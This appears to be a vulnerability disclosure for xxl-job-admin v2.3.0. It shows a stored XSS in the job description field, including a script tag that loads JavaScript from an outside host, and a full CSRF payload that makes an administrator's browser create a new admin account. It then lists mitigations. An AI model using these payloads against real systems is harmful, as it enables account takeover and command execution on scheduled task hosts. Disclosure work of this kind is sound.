Version and Deployment
Product Version
xxl-job-admin v2.3.0
Deployment
mkdir -p /tmp/xxl-job
docker run -d -e PARAMS="--spring.datasource.url=jdbc:mysql://{MYSQL_IP}:{MYSQL_PORT}/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=UTC --spring.datasource.username={MYSQL_USER} --spring.datasource.password={MYSQL_PASSWD} --spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver" -p {XXL-JOB-ADMIN_SERVICE_PORT}:8080 -v /tmp/xxl-job:/data/applogs --name xxl-job -d xuxueli/xxl-job-admin:2.3.0
Replace {MYSQL_IP}``{MYSQL_PORT}``{MYSQL_USER}``{MYSQL_PASSWD}``{XXL-JOB-ADMIN_SERVICE_PORT}
with the actual parameter
And then Import https://github.com/xuxueli/xxl-job/blob/master/doc/db/tables_xxl_job.sql into MySQL
Store XSS
There are two user admin
(administrator) and tari
(normal user with only default executor permission) in this example.
Log in to tari
account, and go to http://127.0.0.1:8089/xxl-job-admin/jobinfo [任务管理] > drop down [操作] box > [编辑]
Input the xss code in [任务描述]
<script src="http://tari.local:8888/payload1.js"/>
The payload1.js
content is
alert(2)
Click [保存] to save, What is actually called here is the http://127.0.0.1:8089/xxl-job-admin/jobinfo/update API interface.
Stored XSS is triggered by an admin accessing a http://127.0.0.1:8089/xxl-job-admin/jobinfo
Use CSRF to Bypass HttpOnly
We can see thathttpOnlyis enabled on this site, which means we cannot get administrator cookies directly
If we look at the HTTP request packet, there is no similar CSRFTOKEN
field
So we can modify payload1.js
to bypass HttpOnly
const xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState === 4) {
console.log('pwn')
}
};
xhr.open("POST", "http://127.0.0.1:8089/xxl-job-admin/user/add", false);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
const params = "username=bypass&password=bypass&role=1&permission=";
xhr.send(params);
The next time an administrator accesses to http://127.0.0.1:8089/xxl-job-admin/jobinfo we will get an administrator user bypass
/bypass
Other XSS Output Location
http://127.0.0.1:8089/xxl-job-admin/jobinfo [任务管理] > drop down [操作] box > [查询日志]
Here also can trigger XSS
Further Thinking on Exploiting vulnerabilities
xxl-job is a distributed task scheduling platform. If we have administrator privileges, it means we can execute arbitrary commands on all subsets of managed tasks
Mitigation
- Validate to catch potentially malicious user-provided input in
/xxl-job-admin/jobinfo/update
API - HTML entity encode data from backend API to prevent potentially XSS.
- Use CSRFToken to Prevent CSRF
暂无答案!
目前还没有任何答案,快来回答吧!